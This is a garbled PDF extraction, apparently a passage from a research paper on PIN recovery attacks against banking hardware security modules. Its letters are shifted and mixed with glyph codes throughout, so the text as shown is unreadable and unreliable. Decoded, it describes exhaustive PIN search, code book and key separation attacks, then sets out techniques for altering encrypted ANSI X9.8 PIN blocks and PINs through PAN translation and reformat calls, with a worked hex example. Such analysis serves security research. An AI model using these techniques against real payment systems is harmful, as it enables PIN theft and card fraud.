DOWKRXJK(cid:3)PDQ\(cid:3)(cid:11)W\SLFDOO\(cid:3)KLVWRULF(cid:12)(cid:3)VLQJOH(cid:3)’(6(cid:3)V\VWHPV(cid:3)VWLOO(cid:3)H[LVW(cid:17)(cid:3)(cid:3)1RWH(cid:15)(cid:3)WKLV(cid:3)LV(cid:3)QRW(cid:3)DQ(cid:3) +DWWDFN(cid:3)DJDLQVW(cid:3)FRUUHFWQHVV(cid:17)(cid:3)(cid:3),Q(cid:3)RXU(cid:3)FXUUHQW(cid:3)UHDOLW\(cid:15)(cid:3)D(cid:3)(cid:22)’(6(cid:3)V\VWHP(cid:3)LV(cid:3)SUDFWLFDOO\(cid:3)LPPXQH(cid:3)WR(cid:3)VXFK(cid:3)DQ(cid:3) +DWWDFN(cid:17) +(cid:21)(cid:17)(cid:21)(cid:17) ([KDXVWLYH(cid:3)3LQ(cid:3)6HDUFK +(cid:21) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +7KH(cid:3)3,1(cid:3)VSDFH(cid:3)LV(cid:3)FRQVLGHUDEOH(cid:3)VPDOOHU(cid:3)WKDQ(cid:3)WKH(cid:3)NH\(cid:3)VSDFH(cid:17)(cid:3)(cid:3),W(cid:3)LV(cid:3)WKXV(cid:3)FULWLFDO(cid:3)WR(cid:3)SUHYHQW(cid:3)DQ(cid:3)DGYHUVDU\(cid:3) +IURP(cid:3)EHLQJ(cid:3)DEOH(cid:3)WR(cid:3)PRXQW(cid:3)VXFK(cid:3)DQ(cid:3)DWWDFN(cid:3)(cid:11)VLQFH(cid:3)KH(cid:3)ZRXOG(cid:3)VXUHO\(cid:3)DQG(cid:3)UDSLGO\(cid:3)VXFFHHG(cid:12)(cid:17)(cid:3)(cid:3),W(cid:3)LV(cid:3)SUREDEO\(cid:3)IRU(cid:3) +WKLV(cid:3)UHDVRQ(cid:3)WKDW(cid:3)WKH(cid:3)$16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)VWDQGDUG(cid:3)(cid:11)3HUVRQDO(cid:3),GHQWLILFDWLRQ(cid:3)1XPEHU(cid:3)(cid:11)3,1(cid:12)(cid:3)0DQDJHPHQW(cid:3)DQG(cid:3) +6HFXULW\(cid:12)(cid:3)VWDWHV(cid:3)(cid:5)7KH(cid:3)V\VWHP(cid:3)VKDOO(cid:3)QRW(cid:3)EH(cid:3)FDSDEOH(cid:3)RI(cid:3)EHLQJ(cid:3)XVHG(cid:3)RU(cid:3)PLVXVHG(cid:3)WR(cid:3)GHWHUPLQH(cid:3)D(cid:3)3,1(cid:3)E\(cid:3) +H[KDXVWLYH(cid:3)WULDO(cid:3)DQG(cid:3)HUURU(cid:5)(cid:17)(cid:3)(cid:3)2QH(cid:3)REYLRXV(cid:3)SRWHQWLDO(cid:3)ZHDNQHVV(cid:3)ZRXOG(cid:3)EH(cid:3)DQ\(cid:3)LPSOHPHQWDWLRQ(cid:15)(cid:3)ZKLFK(cid:3) +DFFHSWV FOHDU(cid:3)3,1V(cid:3)WR(cid:3)HLWKHU(cid:3)WKH(cid:3)3,1(cid:3)YHULILFDWLRQ(cid:3)RU(cid:3)JHQHUDWLRQ(cid:3)IXQFWLRQV(cid:17)(cid:3)(cid:3)$Q(cid:3)$3,(cid:3)WKDW(cid:3)DOORZV(cid:3)VXFK(cid:3) +IXQFWLRQDOLW\(cid:3)W\SLFDOO\(cid:3)UHVWULFWV(cid:3)LW(cid:3)WR(cid:3)D(cid:3)VHFXUH(cid:3)RU(cid:3)DXWKRUL]HG(cid:3)PRGH(cid:15)(cid:3)WKHUHE\(cid:3)HQVXULQJ(cid:3)WKDW(cid:3)LW(cid:3)LV(cid:3)QRW(cid:3) +PLVXVHG(cid:17)(cid:3)(cid:3)$W(cid:3)VRPH(cid:3)SRLQW(cid:15)(cid:3)WKH(cid:3)XVHU(cid:3)KDV(cid:3)WR(cid:3)EH(cid:3)DEOH(cid:3)WR(cid:3)HQWHU(cid:3)D(cid:3)3,1(cid:3)LQ(cid:3)WKH(cid:3)FOHDU(cid:17)(cid:3)(cid:3)+RZHYHU(cid:15)(cid:3)WKLV(cid:3)LV(cid:3)D(cid:3)PDQXDO(cid:3) +SURFHVV(cid:3)(cid:11)XVXDOO\(cid:3)DW(cid:3)D(cid:3)WUXVWHG(cid:3)LQWHUIDFH(cid:12)(cid:3)DQG(cid:3)KHQFH(cid:3)FDQQRW(cid:3)EH(cid:3)HDVLO\(cid:3)DXWRPDWHG(cid:17)(cid:3)(cid:3),Q(cid:3)DGGLWLRQ(cid:15)(cid:3)LW(cid:3)LV(cid:3) +FRPPRQ(cid:3)SUDFWLFH(cid:3)WR(cid:3)GHWHFW(cid:3)DQG(cid:3)SUHYHQW(cid:3)D(cid:3)XVHU(cid:3)WU\LQJ(cid:3)PDQ\(cid:3)FRPELQDWLRQV(cid:17) +(cid:21)(cid:17)(cid:22)(cid:17) 7KH(cid:3)&RGH(cid:3)%RRN(cid:3)$WWDFN +7R(cid:3)PRXQW(cid:3)VXFK(cid:3)DQ(cid:3)DWWDFN(cid:15)(cid:3)WKH(cid:3)DGYHUVDU\(cid:3)ZLOO(cid:3)EXLOG(cid:3)XS(cid:3)D(cid:3)¶FRGH(cid:3)ERRN•(cid:3)FRQWDLQLQJ(cid:3)HYHU\(cid:3)3,1(cid:3)DQG(cid:3)WKH(cid:3)UHVXOW(cid:3) +RI(cid:3)WKDW(cid:3)3,1(cid:3)HQFU\SWHG(cid:3)XQGHU(cid:3)D(cid:3)JLYHQ(cid:3)NH\(cid:17)(cid:3)(cid:3)7R(cid:3)UHFRYHU(cid:3)DQ(cid:3)XQNQRZQ(cid:3)HQFU\SWHG(cid:3)3,1(cid:15)(cid:3)WKH(cid:3)DWWDFNHU(cid:3)VLPSO\(cid:3) +FRQVXOWV(cid:3)WKH(cid:3)FRGHERRN(cid:3)WR(cid:3)ILQG(cid:3)WKH(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)DQG(cid:3)KHQFH(cid:3)LGHQWLI\(cid:3)WKH DVVRFLDWHG(cid:3)3,1(cid:17)(cid:3)(cid:3)6KRXOG(cid:3) +WKH(cid:3)3,1(cid:3)EH(cid:3)HQFU\SWHG(cid:3)XQGHU(cid:3)D(cid:3)GLIIHUHQW(cid:3)NH\(cid:3)WR(cid:3)WKH(cid:3)RQH(cid:3)XVHG(cid:3)IRU(cid:3)WKH(cid:3)FRGHERRN(cid:15)(cid:3)WKH(cid:3)DWWDFNHU(cid:3)VLPSO\(cid:3) +WUDQVODWHV(cid:3)LW(cid:3)WR(cid:3)HQFU\SWLRQ(cid:3)XQGHU(cid:3)WKH(cid:3)FRGHERRN•V(cid:3)NH\(cid:17)(cid:3)(cid:3)$V(cid:3)ZLWK(cid:3)WKH(cid:3)H[KDXVWLYH(cid:3)NH\(cid:3)VHDUFK(cid:15)(cid:3)LW(cid:3)VKRXOG(cid:3)QRW(cid:3) +EH(cid:3)SRVVLEOH(cid:3)IRU(cid:3)WKH(cid:3)DWWDFNHU(cid:3)WR(cid:3)EXLOG(cid:3)XS(cid:3)VXFK(cid:3)D(cid:3)FRGHERRN(cid:3)DQG(cid:3)WKH(cid:3)VDPH(cid:3)SUDFWLFDO(cid:3)OLPLWDWLRQV(cid:3)DSSO\(cid:17)(cid:3)(cid:3) +)RU(cid:3)DQ(cid:3)$16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)IRUPDW(cid:3)Q(cid:3)GLJLW(cid:3)3,1(cid:15)(cid:3)(cid:20)(cid:19)Q HQFU\SWHG(cid:3)3,1(cid:3)EORFNV(cid:3)DUH(cid:3)UHTXLUHG(cid:3)WR(cid:3)EH(cid:3)VWRUHG(cid:3)(cid:11)IRU(cid:3)D(cid:3)JLYHQ(cid:3) +DFFRXQW(cid:3)QXPEHU(cid:12)(cid:17)(cid:3)(cid:3)7KLV(cid:3)UHSUHVHQWV(cid:3)D(cid:3)WULYLDO(cid:3)PHPRU\(cid:3)UHTXLUHPHQW(cid:3)DQG(cid:3)LV(cid:3)LQVLJQLILFDQW WR(cid:3)VHDUFK(cid:17)(cid:3)(cid:3)1DLYHO\(cid:15)(cid:3) +DWWDFNLQJ(cid:3)IRUPDWV(cid:3)FRQWDLQLQJ(cid:3)UDQGRP(cid:3)SDGGLQJ(cid:3)ZRXOG(cid:3)DSSHDU(cid:3)WR(cid:3)UHTXLUH(cid:3)D(cid:3)ODUJHU(cid:3)FRGHERRN(cid:15)(cid:3)EXW(cid:3)WKLV(cid:3)LV(cid:3)QRW(cid:3) +WKH(cid:3) FDVH(cid:17)(cid:3) (cid:3) $OO(cid:3) IRUPDWV(cid:3) DUH(cid:3) ¶HTXDOO\•(cid:3) YXOQHUDEOH(cid:15)(cid:3) VLQFH(cid:3) WKH(cid:3) IRUPDW(cid:3) FDQ(cid:3) EH(cid:3) FKDQJHG(cid:3) LQ(cid:3) WKH(cid:3) +WUDQVODWH(cid:11)UHIRUPDW(cid:12)(cid:3)FDOO(cid:3)(cid:11)WR(cid:3)WKH(cid:3)ZHDNHVW(cid:3)RQH(cid:12)(cid:17)(cid:3)(cid:3)7KH(cid:3)VDPH(cid:3)WHFKQLTXH(cid:3)FDQ(cid:3)EH(cid:3)XVHG(cid:3)WR(cid:3)¶HOLPLQDWH•(cid:3)WKH(cid:3) +YDULDWLRQ(cid:3)RIIHUHG(cid:3)E\(cid:3)WKH(cid:3)3$1(cid:17) ,W(cid:3)LV(cid:3)QRWHZRUWK\(cid:3)WKDW(cid:3)UHJDUGOHVV(cid:3)RI(cid:3)IRUPDW(cid:15)(cid:3)NH\(cid:3)DQG(cid:3)SDQ(cid:15)(cid:3)DOO(cid:3)HQFU\SWHG(cid:3) +SLQV(cid:3)DUH(cid:3)SRWHQWLDOO\(cid:3)YXOQHUDEOH(cid:3)WR(cid:3)D(cid:3)VLQJOH(cid:3)FRGHERRN(cid:17) +(cid:21)(cid:17)(cid:23)(cid:17) .H\(cid:3)6HSDUDWLRQ(cid:3)$WWDFNV +.H\(cid:3)VHSDUDWLRQ(cid:3)LV(cid:3)D(cid:3)PHFKDQLVP(cid:15)(cid:3)ZKLFK(cid:3)HQIRUFHV(cid:3)WKDW(cid:3)D(cid:3)JLYHQ(cid:3)NH\(cid:3)LV(cid:3)XVHG(cid:3)DV(cid:3)LQWHQGHG(cid:17)(cid:3)(cid:3)7KH(cid:3)ZHOO(cid:3)NQRZQ(cid:3) +DWWDFN(cid:3)VFHQDULR(cid:15)(cid:3)LV(cid:3)VXSSO\LQJ(cid:3)DQ(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)DQG(cid:3)WKH(cid:3)3,1(cid:3)HQFU\SWLQJ(cid:3)NH\(cid:3)WR(cid:3)D(cid:3)VWDQGDUG(cid:3)GDWD(cid:3) +GHFU\SW(cid:3)FDOO(cid:15)(cid:3)ZKLFK(cid:3)ZRXOG(cid:3)UHVXOW(cid:3)LQ(cid:3)WKH(cid:3)FOHDU(cid:3)3,1(cid:3)EORFN(cid:3)EHLQJ(cid:3)UHWXUQHG(cid:17)(cid:3)(cid:3)7KLV(cid:3)LV(cid:3)DQ(cid:3)DWWDFN(cid:3)RQ(cid:3)WKH(cid:3) +FRUUHFWQHVV(cid:3)RI(cid:3)WKH(cid:3)WUDQVDFWLRQ(cid:3)VHW(cid:3)DQG(cid:3)GHPRQVWUDWHV(cid:3)WKH(cid:3)QHFHVVLW\(cid:3)WR(cid:3)(cid:10)VHSDUDWH(cid:10)(cid:3)3,1(cid:3)HQFU\SWLQJ(cid:3)NH\V(cid:3) +IURP(cid:3)GDWD(cid:3)GHFU\SWLQJ(cid:3)NH\V(cid:17)(cid:3)(cid:3)7KHUH(cid:3)DUH(cid:3)WZR(cid:3)FRPPRQ(cid:3)PHWKRGV(cid:3)IRU(cid:3)DFKLHYLQJ(cid:3)WKLV(cid:17)(cid:3)(cid:3)7KH(cid:3)ILUVW(cid:3)LV(cid:3)WR(cid:3)XVH(cid:3) +GLIIHUHQW(cid:3)PDVWHU(cid:3)NH\V(cid:3)IRU(cid:3)HQFU\SWLQJ(cid:3)GLIIHUHQW(cid:3)W\SHV(cid:3)RI(cid:3)NH\V(cid:17)(cid:3)(cid:3),QFRUUHFWO\(cid:3)XVLQJ(cid:3)DQ(cid:3)HQFU\SWHG(cid:3)NH\(cid:15)(cid:3) +ZRXOG(cid:3)UHVXOW(cid:3)LQ(cid:3)WKH(cid:3)NH\(cid:3)EHLQJ(cid:3)GHFU\SWHG(cid:3)XQGHU(cid:3)WKH(cid:3)LQFRUUHFW(cid:3)PDVWHU(cid:3)NH\(cid:15)(cid:3)\LHOGLQJ(cid:3)D(cid:3)(cid:10)UDQGRP(cid:10)(cid:3)UHVXOW(cid:17)(cid:3)(cid:3) +7KLV(cid:3)PD\(cid:3)EH(cid:3)GHWHFWHG(cid:3)LI(cid:3)SDULW\(cid:3)FKHFNLQJ(cid:3)RI(cid:3)NH\V(cid:3)LV(cid:3)HQIRUFHG(cid:3)RU(cid:3)HQDEOHG(cid:17)(cid:3)(cid:3)7KH(cid:3)VHFRQG(cid:3)PHWKRG(cid:15)(cid:3)LQYROYHV(cid:3) +WKH(cid:3)FUHDWLRQ(cid:3)RI(cid:3)D(cid:3)YDULDQW(cid:3)RI(cid:3)WKH(cid:3)PDVWHU(cid:3)NH\V(cid:3)EDVHG(cid:3)RQ(cid:3)WKH(cid:3)W\SH(cid:3)RI(cid:3)NH\(cid:17)(cid:3)(cid:3)3HUKDSV(cid:3)WKH(cid:3)PRVW(cid:3)ZLGHO\(cid:3)XVHG(cid:3) +V\VWHP(cid:15)(cid:3)LV(cid:3),%0(cid:10)V(cid:3)FRQWURO(cid:3)YHFWRU(cid:3)PHWKRG(cid:17)(cid:3)(cid:3)$(cid:3)XQLTXH(cid:3)FRQWURO(cid:3)YHFWRU(cid:3)LV(cid:3)DVVRFLDWHG(cid:3)ZLWK(cid:3)HDFK(cid:3)W\SH(cid:3)RI(cid:3)NH\(cid:17)(cid:3)(cid:3) +7R(cid:3)HQFU\SW(cid:3)RU(cid:3)GHFU\SW(cid:3)WKH(cid:3)NH\(cid:15)(cid:3)WKH(cid:3)PDVWHU(cid:3)NH\(cid:3)YDULDQW(cid:3)LV(cid:3)FUHDWHG(cid:3)E\(cid:3)[RU(cid:16)LQJ(cid:3)WKH(cid:3)PDVWHU(cid:3)NH\(cid:3)ZLWK(cid:3)WKH(cid:3) +FRQWURO(cid:3)YHFWRU(cid:17)(cid:3)(cid:3)$JDLQ(cid:15)(cid:3)XVLQJ(cid:3)DQ(cid:3)HQFU\SWHG(cid:3)NH\(cid:3)DV(cid:3)LQFRUUHFW(cid:3)W\SH(cid:15)(cid:3)UHVXOWV(cid:3)LQ(cid:3)D(cid:3)(cid:10)UDQGRP(cid:10)(cid:3)UHVXOW(cid:17) +(cid:22)(cid:17) $WWDFN(cid:3)0RGHOV +:H(cid:3)KDYH(cid:3)WKH(cid:3)IROORZLQJ(cid:3)LQSXWV(cid:29) +x 4XHU\(cid:3)DFFHVV(cid:3)WR(cid:3)D(cid:3)(cid:11)SRWHQWLDOO\(cid:3)WDPSHU(cid:3)SURRI(cid:12)(cid:3)GHYLFH(cid:3)ZLWK(cid:3)WKH(cid:3)W\SLFDO(cid:3)3,1(cid:3)WUDQVDFWLRQ(cid:3)VHW(cid:3)(cid:11)DV(cid:3) +GHVFULEHG(cid:3)DERYH(cid:12) +(cid:22) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +x $Q(cid:3)HQFU\SWHG(cid:3)SLQ(cid:3)HQFU\SWLQJ(cid:3)NH\(cid:3)ZKLFK(cid:3)LV(cid:3)YDOLG(cid:3)IRU(cid:3)WKH(cid:3)GHYLFH(cid:3)DERYH(cid:3)(cid:11)L(cid:17)H(cid:17)(cid:3)WKH(cid:3)3,1(cid:3)HQFU\SWLQJ(cid:3) +NH\(cid:3)LV(cid:3)LWVHOI(cid:3)HQFU\SWHG(cid:3)XQGHU(cid:3)D(cid:3)(cid:11)PDVWHU(cid:12)(cid:3)NH\(cid:3)UHVLGHQW(cid:3)LQ(cid:3)WKH(cid:3)GHYLFH(cid:12) +x $(cid:3)YDOLG(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)(cid:11)(3%(cid:12)(cid:15)(cid:3)ZKLFK(cid:3)ZDV(cid:3)HQFU\SWHG(cid:3)XQGHU(cid:3)WKH(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)HQFU\SWLQJ(cid:3) +NH\(cid:3) +,W(cid:3)LV(cid:3)RXU(cid:3)JRDO(cid:3)WR(cid:3)ILQG(cid:3)VXSHULRU(cid:3)WHFKQLTXHV(cid:3)WR(cid:3)WKRVH(cid:3)OLVWHG(cid:3)XQGHU(cid:3)C.QRZQ(cid:3)$WWDFNV(cid:10)(cid:15)(cid:3)ZKLFK(cid:3)H[SORLW(cid:3) +SRWHQWLDO(cid:3)ODFN(cid:3)RI(cid:3)FRUUHFWQHVV(cid:3)RI(cid:3)WKH(cid:3)W\SLFDO(cid:3)3,1(cid:3)WUDQVDFWLRQ(cid:3)VHWV(cid:17) +(cid:23)(cid:17) 0DQLSXODWLRQ(cid:3)7HFKQLTXHV +:H(cid:3)GHVFULEH(cid:3)D(cid:3)VHW(cid:3)RI(cid:3)WHFKQLTXHV(cid:3)WKDW(cid:3)DOORZ(cid:3)IRU(cid:3)PDQLSXODWLRQ(cid:3)LQ(cid:3)VRPH(cid:3)RU(cid:3)RWKHU(cid:3)XVHIXO(cid:3)PDQQHU(cid:17)(cid:3)(cid:3)7KHVH(cid:3) +WHFKQLTXHV(cid:3)IRUP(cid:3)RXU(cid:3)WRRONLW(cid:3)IRU(cid:3)WKH(cid:3)DWWDFNV(cid:3)WKDW(cid:3)IROORZ(cid:17) +:H(cid:3)DVVXPH(cid:3)WKDW(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)LV(cid:3)LQ(cid:3)$16,;(cid:28)(cid:17)(cid:27)(cid:3)IRUPDW(cid:3)DQG(cid:3)LW(cid:10)V(cid:3)DVVRFLDWHG(cid:3)3$1(cid:3)LV(cid:3)WKH(cid:3)(cid:20)(cid:21)(cid:3)GLJLWV(cid:3)(cid:3) +(cid:3)(cid:5)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:5)(cid:17)(cid:3)(cid:3)7KLV(cid:3)LV(cid:3)D(cid:3)WULYLDO(cid:3)DVVXPSWLRQ(cid:15)(cid:3)VLQFH(cid:3)ZH(cid:3)FDQ(cid:3)DOZD\V(cid:3)XVH(cid:3)WKH(cid:3)UHIRUPDW(cid:3)FDOO(cid:3)WR(cid:3)UHIRUPDW(cid:3) +DQ\(cid:3)RWKHU(cid:3)SLQ(cid:3)EORFN(cid:3)WR(cid:3)WKLV(cid:17)(cid:3)(cid:3))RU(cid:3)VLPSOLFLW\(cid:3)RI(cid:3)UHSUHVHQWDWLRQ(cid:15)(cid:3)ZH(cid:3)DOVR(cid:3)DVVXPH(cid:3)WKDW(cid:3)WKH(cid:3)3,1(cid:3)LV(cid:3)RI(cid:3)OHQJWK(cid:3) +(cid:23)(cid:17) +(cid:23)(cid:17)(cid:20)(cid:17) 0RGLI\LQJ(cid:3)WKH(cid:3)3,1(cid:3)%ORFN +2XU(cid:3)LQWHQWLRQ(cid:3)KHUH(cid:3)LV(cid:3)WR(cid:3)REWDLQ(cid:3)D(cid:3)QHZ(cid:3)(3%(cid:10)(cid:15)(cid:3)ZKLFK(cid:3)KDV(cid:3)WKH(cid:3)VDPH(cid:3)3,1(cid:3)DV(cid:3)WKH(cid:3)RULJLQDO(cid:3)(3%(cid:3)EXW(cid:3)IRU(cid:3)ZKLFK(cid:3) +WKH(cid:3)FOHDU(cid:3)3,1(cid:3)%ORFN(cid:3)3%(cid:10)(cid:3) (cid:3)3%(cid:3)(cid:134) (cid:19)(cid:19)(cid:19)(cid:19)555555555555(cid:17) +7KLV(cid:3)LV(cid:3)WULYLDO(cid:17)(cid:3)(cid:3):H(cid:3)WUDQVODWH(cid:3)IURP(cid:3)WKH(cid:3)RULJLQDO(cid:3)3$1(cid:15)(cid:3)WR(cid:3)D(cid:3)QHZ(cid:3)3$1(cid:10)(cid:3) (cid:3)3$1(cid:3)(cid:134) 555555555555555(cid:17)(cid:3)(cid:3)7KLV(cid:3) +FDQ(cid:3)DOVR(cid:3)EH(cid:3)UHSUHVHQWHG(cid:3)E\(cid:3)3(cid:21)(cid:10)(cid:3) (cid:3)3(cid:21)(cid:3)(cid:134) (cid:19)(cid:19)(cid:19)(cid:19)555555555555(cid:17)(cid:3)(cid:3)2EVHUYH(cid:3)WKH(cid:3)SURFHVV +3%(cid:3) (cid:3) G (cid:11)(3%(cid:12)(cid:3) +(cid:11).(cid:12) +3(cid:20)(cid:3) (cid:3) 3%(cid:3)(cid:134) 3(cid:21)(cid:3) +(cid:3) (cid:19)’3333))))))))))))(cid:3) +3(cid:3)(cid:3) (cid:3) 3333(cid:3) +3(cid:20)(cid:10) (cid:3) (cid:19)’3333))))))))))))(cid:3) +3%(cid:10) (cid:3) 3(cid:20)(cid:10)(cid:3)(cid:134) 3(cid:21)(cid:10)(cid:3) +(cid:3) 3(cid:20)(cid:3)(cid:134) (cid:11)3(cid:21)(cid:3)(cid:134) (cid:19)(cid:19)(cid:19)(cid:19)555555555555(cid:12)(cid:3) +(cid:3) (cid:11)3(cid:20)(cid:3)(cid:134) 3(cid:21)(cid:12)(cid:3)(cid:134) (cid:19)(cid:19)(cid:19)(cid:19)555555555555(cid:12)(cid:3) +(cid:3) 3%(cid:3)(cid:134) (cid:19)(cid:19)(cid:19)(cid:19)555555555555(cid:3) +7KLV FDOO(cid:3)ZLOO(cid:3)DOZD\V(cid:3)VXFFHHG(cid:15)(cid:3)SURYLGHG(cid:3)WKDW(cid:3)WKH(cid:3)YDOXH(cid:3)3(cid:21)(cid:10)(cid:3)REH\V(cid:3)DQ\(cid:3)UXOHV(cid:3)DVVRFLDWHG(cid:3)ZLWK(cid:3)LW(cid:17)(cid:3)1RWH(cid:3)WKDW(cid:3) +WKH(cid:3)YDOXH(cid:3)RI(cid:3)3(cid:20)(cid:3)KDV(cid:3)UHPDLQHG(cid:3)FRQVWDQW(cid:17)(cid:3)(cid:3)7KH(cid:3)RSHUDWLRQ(cid:3)LV(cid:3)GHQRWHG +$16,(cid:3);(cid:28)(cid:17)(cid:27) o $16,(cid:3);(cid:28)(cid:17)(cid:27) +6RXUFH(cid:3)3$1 7DUJHW(cid:3)3$1 +([DPSOH(cid:29) +3,1(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:20)(cid:21)(cid:22)(cid:23) +3$1(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3) (cid:19)(cid:20)(cid:21)(cid:22)(cid:23)(cid:24)(cid:25)(cid:26)(cid:27)(cid:28)(cid:19)(cid:20) +&OHDU(cid:3)3,1(cid:3)%ORFN(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:19)(cid:23)(cid:20)(cid:21)(cid:22)(cid:24)’&%$(cid:28)(cid:27)(cid:26)(cid:25))( +3,1(cid:3)HQF(cid:3)NH\(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24) +(QFU\SWHG(cid:3)3,1(cid:3)%ORFN(cid:3)(cid:3)’&(cid:25)(cid:26)(cid:23)(cid:19)(cid:21)(cid:28)%(cid:23)(cid:26)(cid:25)(cid:25)(cid:25)&(cid:22) +,Q(cid:3)WKH(cid:3)WUDQVODWH(cid:3)FDOO(cid:15)(cid:3)ZH(cid:3)VSHFLI\(cid:3)D(cid:3)QHZ(cid:3)3$1(cid:10) +3$1(cid:10) (cid:20)(cid:20)(cid:21)(cid:22)(cid:23)(cid:24)(cid:25)(cid:26)(cid:27)(cid:28)(cid:19)(cid:20)(cid:3)(cid:11)3$1(cid:10)(cid:3) (cid:3)3$1(cid:3)(cid:134) (cid:20)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:12) +&OHDU(cid:3)3,1(cid:3)%/2&.(cid:3)(cid:3)(cid:3)(cid:3)(cid:3) (cid:19)(cid:23)(cid:20)(cid:21)(cid:21)(cid:24)’&%$(cid:28)(cid:27)(cid:26)(cid:25))((cid:3)(cid:11) (cid:3)3%(cid:3)(cid:134) (cid:19)(cid:19)(cid:19)(cid:19)(cid:20)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:12) +(QFU\SWHG(cid:3)3,1(cid:3)%ORFN(cid:10)(cid:3)(cid:19)(cid:20)(cid:20)(cid:26)(cid:21)(cid:19)’(cid:28)%)(cid:28)’(cid:26)(cid:22))% +(cid:23) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV ++HQFH(cid:3)ZH(cid:3)KDYH(cid:3)VXFFHHGHG(cid:3)LQ(cid:3)PRGLI\LQJ(cid:3)WKH(cid:3)FOHDU(cid:3)3,1(cid:3)EORFN(cid:17) +(cid:23)(cid:17)(cid:21)(cid:17) 0RGLI\LQJ(cid:3)WKH(cid:3)3,1 +’HILQLWLRQ +3$1(cid:3)&DVWLQJ (cid:11)3&(cid:12)(cid:3)LV(cid:3)WKH(cid:3)SURFHVV(cid:3)RI(cid:3)LQWHUSUHWLQJ(cid:3)DQ(cid:3)$16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)3,1(cid:3)EORFN(cid:3)ZLWK(cid:3)D(cid:3)JLYHQ(cid:3)3$1(cid:3)(cid:11)FDOOHG(cid:3)WKH(cid:3) +VRXUFH3$1(cid:12)(cid:3)DV(cid:3)DQ(cid:3)$16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)3,1(cid:3)EORFN(cid:3)ZLWK(cid:3)D(cid:3)FKRVHQ(cid:3)3$1(cid:3)(cid:11)FDOOHG(cid:3)WKH(cid:3)DSSOLHG 3$1(cid:12)(cid:17) +7KLV(cid:3)RSHUDWLRQ(cid:3)LV(cid:3)DFKLHYDEOH(cid:3)(cid:11)HYHQ(cid:3)ZKHQ(cid:3)UHVWULFWHG(cid:3)WR(cid:3)ZRUNLQJ(cid:3)ZLWK(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFNV(cid:12)(cid:3)WKURXJK(cid:3)WKH(cid:3) +XVH(cid:3)RI(cid:3)WKH(cid:3)WUDQVODWH(cid:3)IXQFWLRQ(cid:17)(cid:3)(cid:3)*LYHQ(cid:3)DQ(cid:3)HQFU\SWHG(cid:3)$16,(cid:3);(cid:28)(cid:17)(cid:27)(cid:3)3,1(cid:3)EORFN(cid:3)ZLWK(cid:3)VRXUFH 3$1(cid:15)(cid:3)VXSSO\(cid:3)LW(cid:3)WR(cid:3) +WKH(cid:3)UHIRUPDW(cid:3)FDOO(cid:15)(cid:3)VSHFLI\LQJ(cid:3)WKH(cid:3)DSSOLHG 3$1(cid:3)DV(cid:3)WKH(cid:3)LQSXW(cid:3)3$1(cid:3)IRU(cid:3)WKH(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)DQG(cid:3) +VHOHFWLQJ(cid:3)D(cid:3)VXLWDEOH(cid:3)RXWSXW(cid:3)IRUPDW(cid:3)(cid:11)FDOOHG(cid:3)WKH(cid:3)WDUJHW IRUPDW(cid:12)(cid:17)(cid:3)(cid:3)7KH(cid:3)LPSOHPHQWDWLRQ(cid:3)PD\(cid:3)IDLO(cid:3)WKH(cid:3)FDOO(cid:3)LI(cid:3) +WKH(cid:3)PRGLILHG(cid:3)3,1(cid:3)EORFN(cid:3)GRHV(cid:3)QRW(cid:3)VDWLVI\(cid:3)WKH(cid:3)UXOHV(cid:3)RI(cid:3)WKH(cid:3)LPSOHPHQWDWLRQ(cid:17)(cid:3):H(cid:3)GHQRWH(cid:3)WKH(cid:3)RSHUDWLRQ(cid:3)DV(cid:3)(cid:29) +$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:29)(cid:3)3&(cid:11)$16,(cid:3);(cid:28)(cid:17)(cid:27) (cid:12)(cid:3)o $16,(cid:3);(cid:28)(cid:17)(cid:27) +6RXUFH(cid:3)3$1 $SSOLHG(cid:3)3$1 7DUJHW(cid:3)3$1 +2XU(cid:3)LQWHQWLRQ(cid:3)KHUH(cid:3)LV(cid:3)WR(cid:3)REWDLQ(cid:3)D(cid:3)QHZ(cid:3)(3%(cid:10)(cid:15)(cid:3)ZLWK(cid:3)D(cid:3)PRGLILHG(cid:3)3,1(cid:3)(cid:11)ZULWWHQ(cid:3)DV(cid:3)(cid:3)3(cid:10)(cid:3) (cid:3)3333(cid:3)(cid:134) (cid:19)(cid:19)55(cid:12)(cid:17)(cid:3)(cid:3):H(cid:3) +SHUIRUP(cid:3)D(cid:3)UHIRUPDW(cid:3)FDOO(cid:3)ZLWK(cid:3)DQ(cid:3)LQFRUUHFW(cid:3)LQSXW(cid:3)3$1(cid:10)(cid:3)(cid:11)3(cid:21)(cid:10)(cid:3) (cid:3)3(cid:21)(cid:3)(cid:134) 